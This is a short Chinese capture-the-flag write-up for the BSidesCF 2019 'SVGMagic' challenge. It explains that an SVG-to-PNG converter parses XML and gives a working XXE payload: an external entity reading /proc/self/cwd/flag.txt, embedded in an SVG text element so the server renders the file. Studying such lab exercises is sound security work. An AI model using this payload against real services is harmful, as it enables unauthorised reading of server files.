[BSidesCF 2019]SVGMagic

本文主要是介绍[BSidesCF 2019]SVGMagic，希望对大家解决编程问题提供一定的参考价值，需要的开发者们随着小编来一起学习吧！

知识点：XML外部实体注入（XEE）

标题说把SVG转为PNG

SVG是一种用XML定义的语言，SVG图形是可交互的和动态的，可以在SVG文件中嵌入动画元素或通过脚本来定义动画。

也就是说这里的SVG是个XML,并且存在可控的内容，那么自然就会想到XXE。

究极详细讲解：https://www.freebuf.com/vuls/175451.html

我的理解是：

首先我们要知道，XML 被设计用来传输和存储数据。
然后这个漏洞就是利用了，应用程序在解析XML输入时，没有禁止外部实体的加载。
就拿下面的这个来说<!ENTITY file SYSTEM "file:///proc/self/cwd/flag.txt" >，这个就是外部实体，加载了flag.txt,然后输出，
也就是：应该是实体引用，把加载的东西放出来
<svg height="100" width="1000"><text x="10" y="20">&file;</text>
</svg>

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE note [
<!ENTITY file SYSTEM "file:///proc/self/cwd/flag.txt" >
]>
<svg height="100" width="1000"><text x="10" y="20">&file;</text>
</svg>

这篇关于[BSidesCF 2019]SVGMagic的文章就介绍到这儿，希望我们推荐的文章对编程师们有所帮助！

---